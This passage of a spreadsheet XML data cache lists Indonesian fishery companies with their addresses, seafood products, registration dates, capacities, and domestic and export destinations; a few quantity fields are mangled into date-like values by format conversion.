    <s v="Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Segar (Tongkol, Deho, Selayang, Layang, Tamban, Cakalang)"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="40000"/>
    <s v="Kota Jakarta Utara"/>
    <m/>
  </r>
  <r>
    <n v="23017"/>
    <x v="789"/>
    <s v="PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA"/>
    <s v="Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Ikan Pelagis Beku (Tongkol, Deho, Selayang, Layang, Tamban, Cakalang)"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="100000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23018"/>
    <x v="789"/>
    <s v="PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA"/>
    <s v="Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="15000"/>
    <m/>
    <s v="China, Singapore"/>
  </r>
  <r>
    <n v="23019"/>
    <x v="789"/>
    <s v="PERUSAHAAN UMUM PERIKANAN INDONESIA UNIT NATUNA"/>
    <s v="Kantor Perusahaan Umum Perikanan Indonesia Unit Natuna, Pelabuhan Perikanan Selat Lampa, Kel. Sabang Mawang Balai, Kec. Pulau Tiga, Kabupaten Natuna&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2020-11-26T00:00:00"/>
    <n v="150000"/>
    <s v="Kota Jakarta Utara"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23020"/>
    <x v="790"/>
    <s v="PT. HARTA SAMUDRA"/>
    <s v="Desa Waplau, Kec. Waplau, Kabupaten Buru&lt;br&gt;Maluku"/>
    <n v="31"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-11-20T00:00:00"/>
    <n v="500000"/>
    <s v="Kota Surabaya"/>
    <s v="Viet Nam"/>
  </r>
  <r>
    <n v="23021"/>
    <x v="791"/>
    <s v="PT. FRESH TUNA INDONESIA"/>
    <s v="Jl. Raya Maumbi Jaga XVI, Kel. Mapanget, Kec. Talawaan, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara"/>
    <n v="29"/>
    <s v="Tuna Segar"/>
    <d v="2020-11-10T00:00:00"/>
    <n v="50000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23022"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Tuna Loin Beku"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="30000"/>
    <m/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23023"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Segar (Malong, Sebelah, Kerapu, Gerot-gerot, Layur, Kakap, Baronang, Kurisi, Ekor Kuning)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="36.76"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23024"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Demersal Beku (Malong, Sebelah, Kerapu, Gerot-gerot, Layur, Kakap, Baronang, Kurisi, Ekor Kuning)"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="16/01/1900  10,39,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23025"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Segar (Amberjack, Lemuru, Barakuda, Capelin, Makerel, Semar, Gindara, Salem, Pollock, Sarden, Cakalang)"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="15/01/1900  00,16,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23026"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Ikan Pelagis Beku (Amberjack, Lemuru, Barakuda, Capelin, Makerel, Semar, Gindara, Salem, Pollock, Sarden, Cakalang)"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="02/01/1900  02,46,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23027"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="0.48125000000000001"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23028"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kerang Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="295"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23029"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="1405"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23030"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Kepiting Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="10"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23031"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Segar (Gurita, Cumi-cumi)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="10"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23032"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Cephalopoda Beku (Gurita)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="45.76"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23033"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Telur Ikan Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="10/01/1900  16,01,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23034"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Telur Ikan Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="285"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23035"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Nori"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="15,20,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23036"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="01/01/1900  11,36,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23037"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Tuna Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="01/01/1900  23,06,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23038"/>
    <x v="792"/>
    <s v="PT, MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl, Mahendradatta No,15E-F, Kel, Padangsambian, Kec, Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <s v="04/01/1900  04,37,00"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23039"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Udang Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="239"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23040"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Salmon Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="60000"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23041"/>
    <x v="792"/>
    <s v="PT. MASUYA GRAHA TRIKENCANA"/>
    <s v="Jl. Mahendradatta No.15E-F, Kel. Padangsambian, Kec. Denpasar Barat, Kota Denpasar&lt;br&gt;Bali"/>
    <n v="17"/>
    <s v="Salmon Beku"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="30000"/>
    <s v="Kabupaten Tabanan, Kabupaten Badung, Kabupaten Gianyar, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23042"/>
    <x v="389"/>
    <s v="PT. DKSH INDONESIA"/>
    <s v="PT LF Service Indonesia, Jl. Jawa Kav A1-1 Kawasan Industri MM2100, Kel. Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="MInyak Ikan Omega 3"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Pati, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23043"/>
    <x v="389"/>
    <s v="PT. DKSH INDONESIA"/>
    <s v="PT LF Service Indonesia, Jl. Jawa Kav A1-1 Kawasan Industri MM2100 , Kel. Mekarwangi, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat"/>
    <n v="13"/>
    <s v="Minyak Salmon"/>
    <d v="2021-02-08T00:00:00"/>
    <n v="0"/>
    <s v="Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Pati, Kota Surabaya, Kabupaten Tangerang"/>
    <m/>
  </r>
  <r>
    <n v="23044"/>
    <x v="675"/>
    <s v="KOPERASI NELAYAN BERKAH BAHARI SEJAHTERA"/>
    <s v="Jl, Harapan Gang Cempaka RT 03, Kel, Tungkal Harapan, Kec, Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Ikan Demersal Segar (Kakap Putih, Bawal Hitam, Malong, Sebelah, Senangin, Kerapu)"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23045"/>
    <x v="675"/>
    <s v="KOPERASI NELAYAN BERKAH BAHARI SEJAHTERA"/>
    <s v="Jl, Harapan Gang Cempaka RT 03, Kel, Tungkal Harapan, Kec, Tungkal Ilir, Kabupaten Tanjung Jabung Barat&lt;br&gt;Jambi"/>
    <n v="7"/>
    <s v="Udang Segar"/>
    <d v="2020-11-16T00:00:00"/>
    <n v="100000"/>
    <m/>
    <s v="Malaysia, Singapore"/>
  </r>
  <r>
    <n v="23062"/>
    <x v="673"/>
    <s v="PT. DUA PUTRA UTAMA MAKMUR TBK"/>
    <s v="Jl. Raya Pati - Juwana KM 7, Dukuh Guyangan RT 001 RW 005, Kel. Purworejo, Kec. Pati, Kabupaten Pati&lt;br&gt;Jawa Tengah"/>
    <n v="14"/>
    <s v="Produk Perikanan Bernilai Tambah Beku (Ebi Fritter, Ebi Furai, Ebi Katsu, Crab Cake, Calamari)"/>
    <d v="2021-01-06T00:00:00"/>
    <n v="430918"/>
    <s v="Kabupaten Pati, Kabupaten Semarang"/>
    <s v="Japan"/>
  </r>
  <r>
    <n v="23063"/>
    <x v="793"/>
    <s v="PT. METROPOLITAN MINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Gudang PPI No. 52, 53, dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Pelagis Beku (Lemuru, Tongkol, Kembung, Semar, Salem, Cakalang, Tenggiri)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="3000000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23064"/>
    <x v="794"/>
    <s v="PT. GILANG JAYARAYA"/>
    <s v="Jl. Raya Gilang No. 170, Kel. Gilang, Kec. Taman, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Terasi Udang"/>
    <d v="2021-01-27T00:00:00"/>
    <n v="1800000"/>
    <s v="Kota Jakarta Utara, Kota Surabaya, Kota Denpasar"/>
    <m/>
  </r>
  <r>
    <n v="23065"/>
    <x v="793"/>
    <s v="PT. METROPOLITAN MINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Gudang PPI No.52, 53 dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Ikan Demersal Beku (Kerapu, Layur, Bawal, Kakap, Mata Besar, Malong, Lencam, Sebelah)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23066"/>
    <x v="793"/>
    <s v="PT. METROPOLITAN MINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Gudang PPI No.52, 53 dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Udang Beku"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23067"/>
    <x v="793"/>
    <s v="PT. METROPOLITAN MINA BAHARI"/>
    <s v="Jl. Muara Baru Ujung Gudang PPI No.52, 53 dan 54, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta"/>
    <n v="12"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="3000000"/>
    <s v="Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara"/>
    <s v="China, Korea, Democratic People's Republic of, Viet Nam"/>
  </r>
  <r>
    <n v="23068"/>
    <x v="795"/>
    <s v="CV. KLAMANA ANUGERAH IRIA"/>
    <s v="Jl. Janis (Perum BRI No.02), Kel. Klamana, Kec. Sorong Timur, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="23069"/>
    <x v="795"/>
    <s v="CV. KLAMANA ANUGERAH IRIA"/>
    <s v="Jl. Janis (Perum BRI No.02), Kel. Klamana, Kec. Sorong Timur, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Teripang Kering"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="23070"/>
    <x v="795"/>
    <s v="CV. KLAMANA ANUGERAH IRIA"/>
    <s v="Jl. Janis (Perum BRI No.02), Kel. Klamana, Kec. Sorong Timur, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Gelembung Ikan Kering"/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="23071"/>
    <x v="795"/>
    <s v="CV. KLAMANA ANUGERAH IRIA"/>
    <s v="Jl. Janis (Perum BRI No.02), Kel. Klamana, Kec. Sorong Timur, Kota Sorong&lt;br&gt;Papua Barat"/>
    <n v="33"/>
    <s v="Sirip Pari Kering, Kulit Pari Kering, Tulang Pari Kering "/>
    <d v="2020-11-12T00:00:00"/>
    <n v="1000"/>
    <s v="Kota Jakarta Utara, Kota Makassar"/>
    <s v="China, Hong Kong"/>
  </r>
  <r>
    <n v="23072"/>
    <x v="796"/>
    <s v="CV. ALAM MULIA BAHARI"/>
    <s v="Jl. Pelabuhan Baru, Kel. Bagan Barat, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Senangin, Tenggiri)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="10000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23073"/>
    <x v="796"/>
    <s v="CV. ALAM MULIA BAHARI"/>
    <s v="Jl. Pelabuhan Baru, Kel. Bagan Barat, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Layur, Jenaha)"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="12000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23074"/>
    <x v="796"/>
    <s v="CV. ALAM MULIA BAHARI"/>
    <s v="Jl. Pelabuhan Baru, Kel. Bagan Barat, Kec. Bangko, Kabupaten Rokan Hilir&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-12-22T00:00:00"/>
    <n v="14000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23075"/>
    <x v="797"/>
    <s v="CV. HADI WIJAYA ABADI"/>
    <s v="Jl. Datuk Laksamana Gg. Mawar No.02, Kel. Dumai Kota, Kec. Dumai Kota, Kota Dumai&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Pelagis Segar (Senangin, Tenggiri)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="55000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23076"/>
    <x v="797"/>
    <s v="CV. HADI WIJAYA ABADI"/>
    <s v="Jl. Datuk Laksamana Gg. Mawar No.02, Kel. Dumai Kota, Kec. Dumai Kota, Kota Dumai&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Ikan Demersal Segar (Manyung, Layur, Jenaha)"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="60000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23077"/>
    <x v="797"/>
    <s v="CV. HADI WIJAYA ABADI"/>
    <s v="Jl. Datuk Laksamana Gg. Mawar No.02, Kel. Dumai Kota, Kec. Dumai Kota, Kota Dumai&lt;br&gt;Riau"/>
    <n v="4"/>
    <s v="Udang Segar"/>
    <d v="2020-12-17T00:00:00"/>
    <n v="4000"/>
    <m/>
    <s v="Malaysia"/>
  </r>
  <r>
    <n v="23081"/>
    <x v="798"/>
    <s v="CV. AWANINDO MANDIRI"/>
    <s v="Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="120000"/>
    <s v="Kota Surabaya"/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23082"/>
    <x v="798"/>
    <s v="CV. AWANINDO MANDIRI"/>
    <s v="Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Udang Segar"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23083"/>
    <x v="798"/>
    <s v="CV. AWANINDO MANDIRI"/>
    <s v="Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Beku"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23084"/>
    <x v="798"/>
    <s v="CV. AWANINDO MANDIRI"/>
    <s v="Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Tuna Segar"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23085"/>
    <x v="798"/>
    <s v="CV. AWANINDO MANDIRI"/>
    <s v="Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Beku (Katamba, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23086"/>
    <x v="798"/>
    <s v="CV. AWANINDO MANDIRI"/>
    <s v="Pelabuhan Perikanan Untia, Kel. Untia, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan"/>
    <n v="26"/>
    <s v="Ikan Demersal Segar (Katamba, Kerapu, Kakatua, Pinjalo, Kakap, Kurisi)"/>
    <d v="2021-03-03T00:00:00"/>
    <n v="120000"/>
    <m/>
    <s v="China, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23090"/>
    <x v="148"/>
    <s v="PT. LINTAS LAUT SAMUDERA"/>
    <s v="Executive Industrial Park Blok A3 No.11, Kel. Belian, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau"/>
    <n v="5"/>
    <s v="Tuna Beku"/>
    <d v="2020-11-13T00:00:00"/>
    <n v="300000"/>
    <m/>
    <s v="China, Japan, Malaysia, Singapore, United States"/>
  </r>
  <r>
    <n v="23091"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Fillet Ikan Beku"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="325000"/>
    <m/>
    <m/>
  </r>
  <r>
    <n v="23092"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Cephalopoda Beku (Sotong, Gurita, Cumi-cumi)"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="200000"/>
    <m/>
    <s v="China, Korea, Democratic People's Republic of, Thailand, United States, Viet Nam"/>
  </r>
  <r>
    <n v="23093"/>
    <x v="94"/>
    <s v="CV, SINAR TIRTA"/>
    <s v="Jl, Rembang Industri VII/3 Pier Pasuruan, Kel, Pejangkungan, Kec, Rembang, Kabupaten Pasuruan&lt;br&gt;Jawa Timur"/>
    <n v="16"/>
    <s v="Kerang Beku"/>
    <d v="2021-01-08T00:00:00"/>
    <n v="125000"/>
    <m/>
    <s v="China, Malaysia, Singapore, Taiwan, Province of China"/>
  </r>
  <r>
    <n v="23095"/>
    <x v="455"/>
    <s v="CV. DELAPAN DELAPAN"/>
    <s v="Jl. TGH Faesal No.88X Lingkungan Gerung Sayo Indah, Kel. Mandalika, Kec. Sandubaya, Kota Mataram&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Air Tawar Beku (Gurami, Bandeng)"/>
    <d v="2021-01-04T00:00:00"/>
    <n v="100"/>
    <s v="Kota Mataram"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23096"/>
    <x v="272"/>
    <s v="CV. 88 AURORA"/>
    <s v="Jl. Raya By Pass BIL KM-15, Kel. Jonggat, Kec. Labulia, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
    <n v="18"/>
    <s v="Ikan Air Tawar Beku (Gurami)"/>
    <d v="2020-12-23T00:00:00"/>
    <n v="100"/>
    <s v="Kabupaten Lombok Tengah"/>
    <s v="Indonesia"/>
  </r>
  <r>
    <n v="23097"/>
    <x v="272"/>
    <s v="CV. 88 AURORA"/>
    <s v="Jl. Raya By Pass BIL KM-15, Kel. Jonggat, Kec. Labulia, Kabupaten Lombok Tengah&lt;br&gt;Nusa Tenggara Barat"/>
